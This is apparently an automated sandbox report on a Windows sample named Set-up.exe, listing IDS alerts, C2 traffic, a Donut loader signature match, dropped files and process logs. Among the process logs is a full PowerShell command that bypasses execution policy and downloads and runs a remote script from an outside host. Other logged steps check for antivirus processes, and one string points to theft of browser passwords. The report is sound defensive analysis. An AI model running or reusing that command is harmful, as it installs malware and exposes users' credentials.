              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 188.114.96.3:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 188.114.96.3:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 188.114.96.3:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 188.114.96.3:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 188.114.96.3:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 188.114.96.3:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 188.114.96.3:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 188.114.96.3:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49718 -> 185.161.251.21:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49720 -> 104.21.37.128:443
              Source: Network traffic | Suricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 104.21.37.128:443 -> 192.168.2.5:49720
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: laborersquei.click
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 77 | Host: laborersquei.click
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=35EJJUQY | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12773 | Host: laborersquei.click
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=LZ75PTAWC83KN3CTYS5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15081 | Host: laborersquei.click
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=WP6GKXANLN3P9BWPPON | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20571 | Host: laborersquei.click
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=72U8ILPE5UCMOV | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1243 | Host: laborersquei.click
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=5MC82W35TAR | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1057 | Host: laborersquei.click
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 112 | Host: laborersquei.click
              Source: global traffic | HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: cegu.shop
              Source: global traffic | HTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: klipvumisui.shop
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic | DNS traffic detected: DNS query: laborersquei.click
              Source: global traffic | DNS traffic detected: DNS query: cegu.shop
              Source: global traffic | DNS traffic detected: DNS query: klipvumisui.shop
              Source: global traffic | DNS traffic detected: DNS query: dfgh.online
              Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: laborersquei.click
              Source: Set-up.exe, 00000000.00000003.2184587220.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2195003409.00000000007E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/lm
              Source: Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.trustwave.com/CA03
              Source: Set-up.exe, 00000000.00000003.2156475441.00000000035CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Set-up.exe, 00000000.00000003.2156475441.00000000035CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Set-up.exe, 00000000.00000003.2132766034.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132707546.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132658075.00000000034EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Set-up.exe, 00000000.00000003.2132766034.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132707546.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132658075.00000000034EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Set-up.exe, 00000000.00000003.2156475441.00000000035CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: Set-up.exe, 00000000.00000003.2156475441.00000000035CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: Set-up.exe, 00000000.00000003.2156475441.00000000035CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Set-up.exe, 00000000.00000003.2156475441.00000000035CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Set-up.exe, 00000000.00000003.2156475441.00000000035CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: Set-up.exe, 00000000.00000003.2156475441.00000000035CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknown; HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknown; HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknown; HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknown; HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknown; HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknown; HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknown; HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49712 version: TLS 1.2
              Source: unknown; HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49715 version: TLS 1.2
              Source: unknown; HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.5:49718 version: TLS 1.2
              Source: unknown; HTTPS traffic detected: 104.21.37.128:443 -> 192.168.2.5:49720 version: TLS 1.2

              System Summary

              Source: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe; Window found: window name: AutoHotkey
              Source: C:\Users\user\Desktop\Set-up.exe; Code function: 0_2_006CE421 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,0_2_006CE421
              Source: C:\Users\user\Desktop\Set-up.exe; Code function: 0_2_0040AC8A: DeviceIoControl,DeviceIoControl,DeviceIoControl,DeviceIoControl,0_2_0040AC8A
              Source: Joe Sandbox View; Dropped File: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe 16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
              Source: Joe Sandbox View; Dropped File: C:\Users\user\AppData\Local\Temp\is-2E9FA.tmp\_isetup\_isdecmp.dll 31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
              Source: C:\Users\user\Desktop\Set-up.exe; Code function: String function: 0068983E appears 78 times
              Source: C:\Users\user\Desktop\Set-up.exe; Code function: String function: 0069586E appears 75 times
              Source: C:\Users\user\Desktop\Set-up.exe; Code function: String function: 0046BB5C appears 646 times
              Source: C:\Users\user\Desktop\Set-up.exe; Code function: String function: 004070BB appears 181 times
              Source: Set-up.exe; Static PE information: invalid certificate
              Source: 9ONHJ3I0NWFBK4Q0S62.tmp.5.dr; Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: 9ONHJ3I0NWFBK4Q0S62.tmp.7.dr; Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: 9ONHJ3I0NWFBK4Q0S62.tmp.5.dr; Static PE information: Number of sections : 11 > 10
              Source: 9ONHJ3I0NWFBK4Q0S62.exe.0.dr; Static PE information: Number of sections : 11 > 10
              Source: 9ONHJ3I0NWFBK4Q0S62.tmp.7.dr; Static PE information: Number of sections : 11 > 10
              Source: Set-up.exe, 00000000.00000003.2253840335.000000000385E000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000000.2008160274.0000000000499000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: OriginalFilename7za.exe, vs Set-up.exe
              Source: Set-up.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@59/15@4/3
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00680B71 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,0_2_00680B71
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLibJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5296:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5948:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3716:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1732:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5828:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1680:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3652:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_03
              Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeJump to behavior
              Source: Set-up.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
              Source: Set-up.exe, 00000000.00000003.2144163996.0000000003552000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132973336.00000000034D5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2143885609.00000000034B8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2133223443.00000000034BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Users\user\Desktop\Set-up.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
              Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe "C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe"
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeProcess created: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp "C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp" /SL5="$80070,7785838,845824,C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe "C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe" /VERYSILENT
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeProcess created: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp "C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp" /SL5="$90070,7785838,845824,C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe" /VERYSILENT
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9
              Source: C:\Windows\System32\timeout.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
